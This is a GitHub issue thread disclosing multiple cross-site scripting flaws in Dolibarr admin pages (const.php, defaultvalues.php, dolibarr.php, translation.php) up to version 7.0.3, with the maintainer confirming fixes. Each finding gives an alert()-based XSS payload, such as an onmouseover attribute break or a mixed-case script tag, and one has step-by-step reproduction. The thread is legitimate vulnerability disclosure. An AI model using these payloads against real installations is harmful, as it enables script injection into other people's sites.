### ISSUE TITLE
Vulnerability - Multiple Cross-site Scripting

### ISSUE THREAD

**Issue by om3rcitak** [Dolibarr/dolibarr#9079]
# Vulnerability - Multiple Cross-site Scripting

## Environment
- **Version**:  <=7.0.3
- **OS**: Unix, Windows
- **Web server**:  Any web server
- **PHP**: <=7.2
- **Database**:  Any database

## Vulnerability Tree
1. /admin/const.php (POST=constvalue)
2. /admin/defaultvalues.php (GET=mode)
3. /admin/system/dolibarr.php (GET=leftmenu)
4. /admin/system/dolibarr.php (GET=mainmenu)
5. /admin/translation.php (GET=mode)

### 1. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/const.php
Parameter Name: constvalue
Parameter Type: POST
Attack Pattern: x" onmouseover=alert(0x00D43C) x="

### 2. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/defaultvalues.php
Parameter Name: mode
Parameter Type: GET
Attack Pattern: x" onmouseover=alert(0x00D43C) x="

### 3. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/system/dolibarr.php
Parameter Name: leftmenu
Parameter Type: GET
Attack Pattern: <scRipt>alert(0x00423B)</scRipt>

### 4. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/system/dolibarr.php
Parameter Name: mainmenu
Parameter Type: GET
Attack Pattern: <scRipt>alert(0x00423B)</scRipt>

### 5. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/translation.php
Parameter Name: mode
Parameter Type: GET
Attack Pattern: x" onmouseover=alert(0x00D43C) x="

**Comment by om3rcitak** [comment]
@eldy look at this :)

**Comment by eldy** [comment]
Thanks. Fixed for 7.0.4
Except first point. I can't reproduce. Can you provide me more information on how to reproduce point 1 ?

**Comment by om3rcitak** [comment]
@eldy steps for repro point 1;

1. Go to admin/const.php page
2. Paste to Name, Value and Comment inputs the this payload: `x" onmouseover=alert(0x00D43C) x="`
3. Click Add button.

And, I don't see version 7.0.4 on tags. When tag and publish v7.0.4?

**Comment by eldy** [comment]
Fixed in v11
